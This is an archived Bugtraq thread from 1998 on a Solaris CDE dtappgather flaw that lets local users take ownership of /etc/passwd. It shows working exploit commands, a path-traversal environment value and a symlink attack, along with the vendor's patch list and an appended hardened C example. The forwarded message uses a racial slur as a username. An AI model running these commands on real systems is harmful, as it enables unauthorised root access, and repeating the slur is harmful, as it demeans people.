[8378] in bugtraq


another /usr/dt/bin/dtappgather feature!

daemon@ATHENA.MIT.EDU (Andrea Costantino)
Tue Nov 3 18:58:21 1998

Date: 	Mon, 2 Nov 1998 18:05:59 +0100
Reply-To: Andrea Costantino <costan@AMB1.AMB.POLIMI.IT>
From: Andrea Costantino <costan@AMB1.AMB.POLIMI.IT>
X-To:         news@rootshell.com
To: BUGTRAQ@NETSPACE.ORG

Attached is the message related to this new feature..
The /usr/dt/bin/dtappgather program tries to read the environment variable
$DTUSERSESSION to get the name of the file to seek for.
The file is searched in /var/dt/appconfig/appmanager.
Under SunOS 5.5, 5.5.1 (aka Solaris 2.5, 2.5.1) that directory is 777 or
01777 so you're able to make a symbolic link to the file you wish, but on
SunOS 5.6 (Solaris 2.6) the directory is 755 to avoid this.
Unfortunately dtappgather never checks the $DTUSERSESSION variable, so
you can use the syntax ../../.. etc... to grab the file you wish, even if
you can't write the /var/dt/appconfig/appmanager directory....

For example

costan@penelope$ ls -ald /var/dt/appconfig/appmanager
drwxr-xr-x   9 bin      bin           512 Oct 30 11:27 /var/dt/appconfig/appmanager

costan@penelope$ export $DTUSERSESSION=../../../../etc/passwd
costan@penelope$ /usr/dt/bin/dtappgather
[.... stuff ....]
costan@penelope$ ls -al /etc/passwd
-r-xr-xr-x   1 costan     users           531 Oct  9 14:08 /etc/passwd

This way you're satisfied even without making strange links on strange paths
(the names in CDE are very difficult to remember ;-) )

Best Wishes, admins...
Andrea Costantino (aka k0stan)
Network Manager at DIIAR
Politecnico di Milano

Attached message:
[ http://www.rootshell.com/ ]

Date:         Mon, 23 Feb 1998 15:31:16 +0200
From:         Mastoras <mastoras@PAPARI.HACK.GR>
Subject:      /usr/dt/bin/dtappgather exploit

Buggy program:
        /usr/dt/bin/dtappgather

Description of the problem:
        Local users can change the ownership of any file, thus gaining
root privileges. This happens because "dtappgather" does not check if the
file /var/dt/appconfig/appmanager/generic-display-0 is a symbolic link and
happily chown()s it to the user. When CERT released advisory CA-98.02
about /usr/dt/bin/dtappgather, I played a little with dtappgather and
discovered the problem above, but I thought that patch 104498-02 corrected it,
as described in SUN's section of 98.02. When I applied the patch, I
realised that it was still possible to gain root privs.

Systems Affected:
        *At least* SunOS 5.5 & 5.5.1 running CDE version 1.0.2 with the suid
bit on /usr/dt/bin/dtappgather. SunOS 5.6 (or CDE 1.2) comes with the
directory /var/dt/appconfig/appmanager/ in mode 755, so it's not possible to
make the necessary link. On the other hand, in SunOS 5.5* this dir has
mode 777, so you can easily make the link or even unlink/rename the file
"generic-display-0" if it exists owned by another user.

Quick Fix:
        chmod -s /usr/dt/bin/dtappgather

The Exploit:
        The forwarded exploit was initially posted to hack.gr's security
mailing list: "haxor".


Hack wisely,
Mastoras

        /*
         *  Computer Engineering & Informatics Department, Patras, Greece
         *  Mastor Wins, Fatality!      http://www.hack.gr/users/mastoras
         */

---------- Forwarded message ----------
Date: Sat, 24 Jan 1998 02:48:13 +0200 (EET)
From: Mastoras <mastoras@papari.hack.gr>
Reply-To: haxor@hack.gr
To: haxor@papari.hack.gr, Undisclosed recipients:  ;
Subject: [HAXOR:11] dtappgather exploit

Hello,

        I suppose you have learnt about CERT's advisory on dtappgather
program. Well, here's the exploit:

nigg0r@host% ls -l /etc/passwd
-r--r--r--   1 root     other        1585 Dec 17 22:26 /etc/passwd
nigg0r@host% ln -s /etc/passwd /var/dt/appconfig/appmanager/generic-display-0
nigg0r@host% dtappgather
MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists
nigg0r@host% ls -l /etc/passwd
-r-xr-xr-x   1 nigg0r   niggers      1585 Dec 17 22:26 /etc/passwd
nigg0r@host% echo "nigg0r wins! Fatality!" | mail root

        It would be easy to find the exploit if you had read CERT's advisory.
The following steps were enough..

% cp /usr/dt/bin/dtappgather .          [you can't "truss" suid proggies]
% truss -o koko ./dtappgather
% more koko
[ shitty ld things ]
chown("/var/dt/appconfig/appmanager/generic-display-0", 666, 666) = 0
chmod("/var/dt/appconfig/appmanager/generic-display-0", 0555) = 0
[ shitty things ]

        I hope this was not too lame or well-known :-)


Seeya,
mastoras
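
As an added defensive example (not dtappgather's own code and not from either poster), here is a reconstruction of the unsafe pattern both messages describe, in its hardened form: the session name taken from the environment is validated before it is joined to the application-manager directory, and the chown is done on a descriptor opened with O_NOFOLLOW, so a planted symbolic link such as the one above is refused instead of resolved. The function names, the validation rules and the scratch fixture under /tmp are assumptions for the demonstration; the real program creates the directory itself, which this sketch omits.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Reject names that could escape the base dir: empty, ".", "..", or any '/'. */
int session_name_ok(const char *name) {
    if (name == NULL || *name == '\0') return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    return strchr(name, '/') == NULL;
}

/* Open <base_dir>/<name> without following a symlink in the final component,
 * confirm it is a real directory, then chown by descriptor. 0 = ok, -1 = refused. */
int chown_session_dir(const char *base_dir, const char *name, uid_t uid, gid_t gid) {
    if (!session_name_ok(name)) { errno = EINVAL; return -1; }
    int base = open(base_dir, O_RDONLY | O_DIRECTORY);
    if (base < 0) return -1;
    /* O_NOFOLLOW: a planted link (e.g. to /etc/passwd) makes the open fail
     * instead of being resolved and then chowned. */
    int fd = openat(base, name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    int saved = errno; close(base);
    if (fd < 0) { errno = saved; return -1; }
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISDIR(st.st_mode)) { close(fd); errno = ENOTDIR; return -1; }
    int rc = fchown(fd, uid, gid);   /* acts on the opened inode only */
    close(fd); return rc;
}

/* Constructed fixture: a scratch base dir with one real session dir and one symlink
 * named like a session. Returns 1 when the hardened routine accepts the directory
 * but refuses both the link and a traversal name like the one in the report. */
int run_fixture_checks(void) {
    char base[] = "/tmp/appmgr-XXXXXX", real[256], link[256];
    if (mkdtemp(base) == NULL) return 0;
    snprintf(real, sizeof real, "%s/generic-display-0", base);
    snprintf(link, sizeof link, "%s/generic-display-1", base);
    if (mkdir(real, 0755) != 0 || symlink("/etc/passwd", link) != 0) return 0;
    uid_t u = getuid(); gid_t g = getgid();
    int ok = chown_session_dir(base, "generic-display-0", u, g) == 0
          && chown_session_dir(base, "generic-display-1", u, g) != 0
          && chown_session_dir(base, "../../../../etc/passwd", u, g) != 0
          && errno == EINVAL;
    unlink(link); rmdir(real); rmdir(base);
    return ok;
}
```

The same refusal applies whether the directory is world-writable (the 5.5 symlink case) or not (the 5.6 traversal case), because neither the link nor the ../ name survives the checks.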

--------------------------------------------------------------------------

Steven Goldberg - SE - Seattle WA (steven.goldberg@West.Sun.COM)

Hi,

Sun has published the following patches to address this
vulnerability:

patches  104497    CDE 1.0.1: dtappgather patch
patches  104498    CDE 1.0.2: dtappgather patch
patches  104499    CDE 1.0.1_x86: dtappgather patch
patches  104500    CDE 1.0.2_x86: dtappgather patch
patches  105837    CDE 1.2: dtappgather Patch
patches  105838    CDE 1.2_x86: dtappgather Patch


thanks,

Steve
